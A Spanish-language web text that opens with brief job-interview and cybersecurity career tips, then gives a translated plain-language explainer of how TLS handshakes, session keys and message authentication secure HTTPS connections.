Especialmente al responder a las preguntas de la entrevista de comportamiento, el método STAR proporciona un buen marco de cómo proporcionar respuestas:

• Describe la situación en la que te encontrabas.
• ¿Qué tarea estaba realizando y cuál era el objetivo deseado?
• Describe la(s) acción(es) que tomaste para abordar la situación. Sé específico y concéntrate en tus contribuciones.
• ¿Cuál fue el resultado de sus acciones?

Los trabajos disponibles en ciberseguridad son muchos y cubren numerosas especializaciones que van desde roles técnicos y prácticos hasta roles de Gobierno y diseño. Utiliza estos consejos para conseguir el trabajo perfecto y... ¡Te doy la bienvenida a la Ciberseguridad!

Pero si quieres enviar datos de forma confidencial por internet, quizás debas cubrir estas consideraciones adicionales.

TLS o Seguridad de Capa de Transporte, se refiere a un protocolo. "Protocolo" es una palabra que significa, "la forma en la que acordamos hacer las cosas por aquí", más o menos.

La parte de "capa de transporte" simplemente se refiere a la comunicación host-to-host, como la forma en que interactúan un servidor y un cliente, en la familia de protocolos de Internet.

El protocolo TLS intenta resolver estos problemas fundamentales:

• ¿Cómo aseguro que tú eres quien dices ser?
• ¿Cómo aseguro que este mensaje que viene de ti, no ha sido manipulado?
• ¿Cómo podemos comunicarnos de forma segura?

A continuación, veremos como funciona TLS, explicado en español sencillo. Como en todas las interacciones exitosas, todo inicia con un "handshake".

Conociéndote

El proceso básico de TLS handshake involucra un cliente, como puede ser tu navegador de internet, y un servidor, como uno de hospedaje web que almacena una página, estableciendo algunas reglas para la comunicación.

Todo empieza cuando el cliente dice hola. Literalmente. Este mensaje es llamado ClientHello.

El ClientHello le dice al servidor cuales versiones del protocolo TLS y suite de cifrado soporta.

Aunque "suite de cifrado" suena como una mejora en un hotel de lujo, en realidad se refiera a un set de algoritmos que pueden ser utilizados para asegurar las comunicaciones.

El servidor, en un mensaje llamado ServerHello, elije cuál de las versiones de protocolo y suite de cifrado de las ofrecidas por el cliente usará. Algunos datos adicionales podrían ser enviados, por ejemplo, el ID de la sesión, si es que el servidor soporta restablecimiento de "handshake" anterior.

Dependiendo de la suite de cifrado elegido, el cliente y el servidor intercambian información adicional para establecer un secreto compartido.

Frecuentemente, este proceso se mueve del intercambio de criptografía asimétrica a criptografía simétrica, con diferentes niveles de complejidad. Exploremos estos conceptos a nivel general y verás porque importan para TLS.

Inicio Asimétrico

Esto es asimetría:

La criptografía asimétrica es un método por el cual puedes realizar autentificación. Cuando te autentificas, tu respondes a la pregunta fundamental, "¿Cómo sé que tu eres quien dices ser?"

En un sistema criptográfico asimétrico, utilizas un par de llaves para lograr la autentificación. Estas llaves son asimétricas. Una es tu llave pública, la cual, como pudiste imaginar, es pública. La otra es tu llave privada, la cual - bueno, tu sabes.

Típicamente, durante el "handshake" de TLS, el servidor proveerá su llave pública por medio de su certificado digital, algunas veces llamado certificado SSL, aunque en realidad TLS reemplaza el protocolo obsoleto Secure Sockets Layer (SSL).

Los certificados digitales son proporcionados y verificados por un tercero confiable, conocidos como Certificate Authorities (CA), los cuales requerirían otro artículo completo.

Mientras cualquiera puede encriptar un mensaje utilizando tu llave pública, solo tu llave privada puede descifrar ese mensaje.

La seguridad de la criptografía asimétrica se basa solo en que tu llave privada se mantiene privada, por eso la asimetría.

También es asimétrica en el sentido que es solo viaje de un solo sentido. Alicia te puede enviar mensajes encriptados con tu llave pública, pero ninguna de tus llaves te servirá para enviar un menaje encriptado a Alicia.

Secretos de Asimetría

La criptografía asimétrica requiere mas recursos computacionales que la criptografía simétrica.

Por ello cuando el TLS handshake inicia con un intercambio asimétrico, el cliente y el servidor usará esta comunicación inicial para establecer un secreto compartido, algunas veces llamada llave de sesión. Esta llave es simétrica, significa que ambos extremos usan el mismo secreto compartido y deben mantener este secreto para que la encriptación sea segura.

‌Utilizando inicialmente la comunicación asimétrica para establecer la llave de sesión, el cliente y el servidor pueden confiar en que la llave de sesión sea conocida solo por ellos dos. Para el resto de la sesión, ellos utilizan esta misma llave compartida para encriptar y descifrar los menajes, lo cual agiliza la comunicación.

Sesiones seguras

El TLS handshake  puede utilizar criptografía asimétrica u otra suite de cifrado para establecer la llave de sesión compartida. Una vez que esta llave de sesión es establecida, la parte del "handshake" esta completada y la sesión inicia.

La sesión es la duración de la comunicación encriptada entre el cliente y el servidor. Durante este tiempo, los mensajes son encriptados y descifrados utilizando la llave de sesión que solo el cliente y el servidor tienen. Esto asegura que la comunicación es segura.

La integridad de la información intercambiada es mantenida utilizando una comprobación (checksum). Los mensajes intercambiados utilizando la llave de sesión llevan adjunto un código de autentificación de mensaje (MAC). El MAC es generado y verificado utilizando la llave de sesión.

Debido a esto, cualquiera de los dos puede detectar si el mensaje ha sido cambiado antes de recibirlo. Esto resuelve la pregunta fundamental, "¿Cómo aseguro que el mensaje que enviaste no ha sido manipulado?"

Las sesiones pueden terminar deliberadamente, podría ser debido a una desconexión de red, o porque el cliente no interactúa por mucho tiempo. Una vez que termina la sesión, para continuar la comunicación, ésta deberá ser reestablecida por medio de un nuevo "handshake" o por medio de la sesión previamente establecida llamada ID de sesión, que permite continuar la sesión anterior.

TLS y tu

Resumiendo:

• TLS es un protocolo criptográfico para proveer comunicación segura.
• El proceso de crear una conexión segura inicia con un "handshake".
• Después del "handshake", se establece la llave de sesión compartida, que será utilizada para asegurar los mensajes y proveer integridad a los mismos.
• Las sesiones son temporales, y una vez terminadas, se deben reestablecer o resumir.

Este es solo solo un desnatado a nivel de superficie, de un muy complejo sistema criptográfico que ayuda a mantener las comunicaciones seguras. Para adentrarse más en este tópico, recomiendo explorar las suites de cifrado y los algoritmos soportados.

El protocolo TLS sirve para un propócito muy importante en tu vida diaria. Ayuda a asegurar los correos de tu familia, tus actividades bancarias en línea y la conexión por la cual estas leyendo este artículo.

El protocolo de comunicación HTTPS es encriptado utilizando TLS. Cada vez que vez ese pequeño candado en la barra de dirección de tu navegador, estas experimentando de primera mano todos los conceptos que acabas de leer en este artículo.

Entonces ahora tú sabes la respuesta a la última pregunta: "¿Cómo puedo comunicarme de forma segura?"

Traducido del artículo de Victoria Drake - What is TLS? Transport Layer Security Encryption Explained in Plain English